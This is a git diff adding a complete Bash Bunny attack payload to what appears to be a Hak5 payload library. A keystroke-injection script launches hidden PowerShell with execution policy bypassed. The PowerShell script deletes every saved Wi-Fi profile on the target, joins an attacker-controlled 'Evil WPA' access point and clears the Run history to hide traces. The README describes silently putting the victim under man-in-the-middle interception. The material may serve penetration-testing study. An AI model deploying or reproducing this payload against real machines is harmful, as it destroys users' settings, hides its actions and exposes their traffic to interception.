diff --git a/payloads/library/general/Pineapple-Connect-Windows/README.md b/payloads/library/general/Pineapple-Connect-Windows/README.md new file mode 100644 index 00000000..63a7a79d --- /dev/null +++ b/payloads/library/general/Pineapple-Connect-Windows/README.md @@ -0,0 +1,23 @@ +Title: Pineapple-Connect-Windows aka PanicAcid's Incog-neato WiFi Switcheroo'er + +Author: PanicAcid + +Version: 1.0 + +Deletes all saved wlans on a target machine and creates a new saved wlan with your desired SSID and PSK + +Think getting a client to connect to your Mk7's Evil WPA Access Point. + +Picture the scene, you're on assignemnt, you manage to get access to your targets laptop by whatever means, pop this payload in and bam! In a matter of seconds they're unknowingly redirected to your Pineapple. + +If you have your Pineapple on the same network they were on, there's little chance they'd even notice the change. (short of doing an ipconfig or checking the connected network, who does that unless something's not working right? Congrats, you're now the MITM. Have at it. + +Inspired by thatguy.exe on the Hak5 Discord + +# Purple.............Loading +# Green .............Execute +# Off................Finished + +Note that once again you'll want to set your DuckyLang to the correct language in the payload.txt and you'll need to edit the SSID and PSK variables in pconnect.ps1 + +This is intended to be used with the Evil WPA Access Point feature in the current Beta / up-coming Stable WiFi Pineapple Mk VII firmware. \ No newline at end of file diff --git a/payloads/library/general/Pineapple-Connect-Windows/payload.txt b/payloads/library/general/Pineapple-Connect-Windows/payload.txt new file mode 100644 index 00000000..310d7389 --- /dev/null +++ b/payloads/library/general/Pineapple-Connect-Windows/payload.txt @@ -0,0 +1,45 @@ +#!/bin/bash +# Title: Pineapple-Connect-Windows aka PanicAcid's Incog-neato WiFi Switcheroo'er +# Description: Deletes all saved wlans on a target machine and creates a new saved wlan with your desired SSID and PSK +# Think getting a client to connect to your Mk7's Evil WPA Access Point +# Inspired by thatguy.exe on the Hak5 Discord +# Author: PanicAcid +# Version: 1.0 +# Category: General +# Target: Windows (Powershell) +# Attackmodes: HID, STORAGE +# +# Purple.............Loading +# Green .............Execute +# Off................Finished + + + +# OPTIONS - More options available in the Powershell payload +OBFUSCATECMD="N" # Y=yes or N=no + +#----------------------------------- +# Purple LED - initializing +LED SETUP + +GET SWITCH_POSITION +DUCKY_LANG gb +# Attackmode HID / Storage +ATTACKMODE HID STORAGE + +#----------------------------------- +# Green LED - executing + +LED STAGE1 + +#Let's Go! + +QUACK GUI r +QUACK DELAY 300 +QUACK STRING Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pconnect.ps1')" +QUACK ENTER + +#----------------------------------- +# Kill the lights - finished + +LED FINISH \ No newline at end of file diff --git a/payloads/library/general/Pineapple-Connect-Windows/pconnect.ps1 b/payloads/library/general/Pineapple-Connect-Windows/pconnect.ps1 new file mode 100644 index 00000000..4a2aeba1 --- /dev/null +++ b/payloads/library/general/Pineapple-Connect-Windows/pconnect.ps1 @@ -0,0 +1,52 @@ + +$savedwlans = (netsh.exe wlan show profiles) -match " All User Profile : " +$savedwlans = $savedwlans -replace " All User Profile : " + +$profilexml="$env:temp\Pineapple.xml" +$SSID="PineAP_WPA" +$PSK="pineapplesareyummy" + +ForEach ($savedwlan in $savedwlans){ + +netsh wlan delete profile name=$savedwlan + +} + + +$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' +$xmlfile=" + + $SSID + + + $SSIDHEX + $SSID + + + ESS + auto + + + + WPA2PSK + AES + false + + + passPhrase + false + $PSK + + + + +" + +$XMLFILE > ($profilexml) +netsh wlan add profile filename="$($profilexml)" +netsh wlan show profiles $SSID key=clear +netsh wlan connect name=$SSID + +rm $profilexml + +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue